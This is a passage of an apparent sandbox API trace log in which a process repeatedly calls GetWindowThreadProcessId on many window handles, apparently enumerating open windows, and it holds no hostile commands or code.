	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2004
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1f88
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1f84
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2050
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1e04
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1ecc
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1e64
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b58
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1e94
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1e28
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1df8
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1da8
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1c70
	[0947.835] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x163c
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1a10
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x186c
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1d74
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4c8
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1960
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1ce4
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b24
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x14e0
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x17f0
	[0947.836] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x854
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1268
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1624
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b9c
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x16f4
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x145c
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x17d0
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1d28
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xcb8
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1190
	[0947.837] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x3a8
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1bd0
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1bfc
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1a78
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b90
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b04
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b34
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b64
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1bb0
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1acc
	[0947.838] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1a2c
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x19a8
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1944
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x18c8
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x18ac
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x18ec
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1898
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc98
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x153c
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1808
	[0947.839] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x12a4
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1740
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x16c4
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1820
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x16ac
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1858
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1664
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x10b4
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x10ac
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x10ec
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1068
	[0947.840] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x17e0
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x102c
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x17a4
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1050
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1694
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1770
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1720
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x165c
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1578
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x16c0
	[0947.841] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x161c
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1638
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x15c8
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1554
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1674
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1520
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x14bc
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xf8c
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe9c
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1434
	[0947.842] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x14ec
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xfcc
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x12ac
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1484
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x934
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc0c
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xb08
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x948
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1178
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x13e0
	[0947.843] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xcd0
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x13fc
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xdc8
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc18
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc2c
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa1c
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1244
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xdb0
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1398
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1358
	[0947.844] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1370
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1340
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x130c
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x12c0
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x12e4
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1270
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1298
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x120c
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x122c
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x11c4
	[0947.845] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x11b0
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1188
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1148
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1160
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x10fc
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe34
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xea4
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x514
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe48
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xbc8
	[0947.846] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xdf8
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x318
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xcac
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x8bc
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xf9c
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xf48
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe40
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xecc
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xeb8
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe80
	[0947.847] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe98
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe60
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xee4
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xf00
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xdf0
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xe1c
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xdd0
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xd94
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xd74
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xd00
	[0947.848] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xcd8
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc84
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xca4
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc64
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xc24
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xb84
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xbac
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x384
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xab8
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x33c
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa44
	[0947.849] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa64
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x8a8
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xaf0
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x88c
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xb04
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x910
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x230
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xac0
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xab4
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xaac
	[0947.850] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x3d0
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x978
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa7c
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x59c
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa88
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa6c
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa68
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x9f8
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xa04
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x924
	[0947.851] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x8dc
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x7dc
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x768
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x764
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x820
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x810
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x794
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x83c
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x7ac
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xb44
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x6bc
	[0947.852] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0xb5c
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x838
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.853] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x818
